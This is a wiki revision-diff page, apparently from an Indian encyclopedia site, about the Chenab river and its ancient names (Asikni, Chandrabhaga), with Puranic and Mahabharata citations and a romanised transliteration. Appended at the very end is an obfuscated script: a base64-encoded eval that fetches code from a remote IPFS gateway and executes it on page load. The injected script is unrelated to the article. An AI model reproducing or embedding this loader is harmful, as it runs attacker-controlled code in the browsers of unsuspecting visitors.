Difference between revisions of "चिनाव नदी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*ऊपरी [[हिमालय]] पर टांडी में चंन्द्र और भाग नदियाँ मिलती हैं जो चिनाब नदी कहलाती है।
+
[[चित्र:Chenab-River.jpg|thumb|250px|चिनाव नदी]]
*यह जम्मू [[कश्मीर]] से होती हुई [[पंजाब]] में बहती है।
 
*इसको वैदिक साहित्य में असिक्नी कहा गया है।
 
*[[महाभारत]] काल में इसका नाम चंद्रभागा भी प्रचलित हो गया था-'शतद्रूं चंद्रभागा च यमुना च महानदीम्, दृषद्ववतीं विपाशां च विपापां स्थूलवालुकाम्'।<ref>[[भीष्म पर्व महाभारत|भीष्मपर्व]] 9, 15</ref>
 
*[[भागवत पुराण|श्रीमदभागवत्]]<ref>श्रीमदभागवत्  5, 19, 18</ref> में चन्द्रभागा और असिक्नी दोनों का नाम एक ही स्थान में है - 'शतद्रूश्चंद्रभागा मरूदवृधा वितस्ता-असिक्नी विश्वेति महानद्यः'।
 
*यहाँ चंद्रभागा के ही दूसरे नाम असिक्नी का उल्लेख है।
 
*ग्रीक लेखकों ने इस नदी को अकेसिनीज लिखा है। जो असिक्नी का ही स्पष्ट रूपांतर है।
 
*चंद्रभागा नदी मानसरोवर (तिब्बत) के निकट [[चंद्रभाग|चंद्रभाग पर्वत]] नामक पर्वत से निस्सृत होती है और [[सिंधु नदी]] में गिर जाती है।
 
*श्रीमदभागवत् में शायद इसी नदी की ऊपरी धारा को चंद्रभागा कहकर, पुनः शेष नदी का प्राचीन वैदिक नाम असिक्नी कहा गया है।
 
*यह भी संभव है कि प्रस्तुत उल्लेख में चंद्रभागा से दक्षिण [[भारत]] की भीमा का अभिप्राय हो किंतु यहाँ दिए गए अन्य नामों के कारण यह संभावना कम जान पड़ती है।
 
*[[विष्णु पुराण]]<ref>विष्णुपुराण 2, 3, 10</ref> में भी चंद्रभागा का उल्लेख है- 'शतद्रू चंद्रभागाद्याः हिमवत् पादनिर्गताः'। यहाँ इस नदी को हिमाचल से उदभुत माना है।
 
*विष्णु पुराण<ref>विष्णु पुराण 4, 24, 69 ('सिंधु दार्विकोर्वी चंद्रभागाकाश्मीर विषयांश्चव्रात्यम्लेच्छशूद्रादयो भोक्ष्यन्ति')</ref> से ज्ञात होता है कि चंद्रभागा नदी का तटवर्ती प्रदेश पूर्वगुप्तकाल में म्लेच्छों तथा यवन-शकादि द्वारा शासित था।
 
  
 +
'''चिनाब नदी''' [[जम्मू कश्मीर]] से होती हुई [[पंजाब]] राज्य में बहने वाली नदी है। इस नदी को [[वैदिक साहित्य]] में '[[असिक्नी नदी|असिक्नी]]' नाम से सम्बोधित किया गया है। ऊपरी [[हिमालय]] पर टांडी में 'चन्द्र' और 'भाग' नदियाँ मिलती हैं, जो चिनाब नदी कहलाती हैं।
 +
 +
*[[महाभारत]] काल में इस नदी का नाम 'चंद्रभागा' भी प्रचलित हो गया था-
 +
<blockquote>'शतद्रूं चंद्रभागा च यमुना च महानदीम्, दृषद्ववतीं विपाशां च विपापां स्थूलवालुकाम्'।<ref>[[भीष्म पर्व महाभारत|भीष्मपर्व]] 9, 15</ref></blockquote>
 +
*[[श्रीमद्भागवत|श्रीमदभागवत]]<ref>श्रीमदभागवत्  5, 19, 18</ref> में चन्द्रभागा और असिक्नी दोनों का नाम एक ही स्थान में है-
 +
<blockquote>'शतद्रूश्चंद्रभागा मरूदवृधा वितस्ता-असिक्नी विश्वेति महानद्यः'</blockquote>
 +
 +
यहाँ चंद्रभागा के ही दूसरे नाम असिक्नी का भी उल्लेख है। ग्रीक लेखकों ने इस नदी को 'अकेसिनीज' लिखा है, जो असिक्नी का ही स्पष्ट रूपांतर है। चंद्रभागा नदी [[कैलाश मानसरोवर|मानसरोवर]] ([[तिब्बत]]) के निकट चंद्रभाग नामक [[पर्वत]] से निस्सृत होती है और [[सिंधु नदी]] में गिर जाती है। श्रीमदभागवत में शायद इसी नदी की ऊपरी धारा को चंद्रभागा कहकर, पुनः शेष नदी का प्राचीन वैदिक नाम असिक्नी कहा गया है। यह भी संभव है कि प्रस्तुत उल्लेख में चंद्रभागा से [[दक्षिण भारत]] की भीमा का अभिप्राय हो, किंतु यहाँ दिए गए अन्य नामों के कारण यह संभावना कम जान पड़ती है।
 +
 +
[[विष्णु पुराण]]<ref>विष्णुपुराण 2, 3, 10</ref> में भी चंद्रभागा का उल्लेख निम्न प्रकार से है-
 +
<blockquote>'शतद्रू चंद्रभागाद्याः हिमवत् पादनिर्गताः'</blockquote>
 +
 +
उपर्युक्त में इस नदी को [[हिमाचल प्रदेश|हिमाचल]] से उदभुत माना गया है। विष्णु पुराण<ref>विष्णु पुराण 4, 24, 69 ('सिंधु दार्विकोर्वी चंद्रभागाकाश्मीर विषयांश्चव्रात्यम्लेच्छशूद्रादयो भोक्ष्यन्ति'</ref> से ज्ञात होता है कि चंद्रभागा नदी का तटवर्ती प्रदेश पूर्व [[गुप्त काल]] में म्लेच्छों तथा [[यवन]]-[[शक]] आदि द्वारा शासित था।
 +
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{भारत की नदियाँ}}
 
{{भारत की नदियाँ}}
 +
[[Category:जम्मू और कश्मीर की नदियाँ]]
 +
[[Category:पंजाब की नदियाँ]]
 +
[[Category:भारत की नदियाँ]]
 
[[Category:भूगोल कोश]]
 
[[Category:भूगोल कोश]]
[[Category:भारत की नदियाँ]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 07:08, 21 May 2012

thumb|250px|chinav nadi

chinab nadi jammoo kashmir se hoti huee panjab rajy mean bahane vali nadi hai. is nadi ko vaidik sahity mean 'asikni' nam se sambodhit kiya gaya hai. oopari himalay par taandi mean 'chandr' aur 'bhag' nadiyaan milati haian, jo chinab nadi kahalati haian.

  • mahabharat kal mean is nadi ka nam 'chandrabhaga' bhi prachalit ho gaya tha-

'shatadrooan chandrabhaga ch yamuna ch mahanadimh, drishadvavatian vipashaan ch vipapaan sthoolavalukamh'.[1]

'shatadrooshchandrabhaga maroodavridha vitasta-asikni vishveti mahanadyah'

yahaan chandrabhaga ke hi doosare nam asikni ka bhi ullekh hai. grik lekhakoan ne is nadi ko 'akesinij' likha hai, jo asikni ka hi spasht roopaantar hai. chandrabhaga nadi manasarovar (tibbat) ke nikat chandrabhag namak parvat se nissrit hoti hai aur siandhu nadi mean gir jati hai. shrimadabhagavat mean shayad isi nadi ki oopari dhara ko chandrabhaga kahakar, punah shesh nadi ka prachin vaidik nam asikni kaha gaya hai. yah bhi sanbhav hai ki prastut ullekh mean chandrabhaga se dakshin bharat ki bhima ka abhipray ho, kiantu yahaan die ge any namoan ke karan yah sanbhavana kam jan p dati hai.

vishnu puran[3] mean bhi chandrabhaga ka ullekh nimn prakar se hai-

'shatadroo chandrabhagadyaah himavath padanirgataah'

uparyukt mean is nadi ko himachal se udabhut mana gaya hai. vishnu puran[4] se jnat hota hai ki chandrabhaga nadi ka tatavarti pradesh poorv gupt kal mean mlechchhoan tatha yavan-shak adi dvara shasit tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. bhishmaparv 9, 15
  2. shrimadabhagavath 5, 19, 18
  3. vishnupuran 2, 3, 10
  4. vishnu puran 4, 24, 69 ('siandhu darvikorvi chandrabhagakashmir vishayaanshchavratyamlechchhashoodradayo bhokshyanti'

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>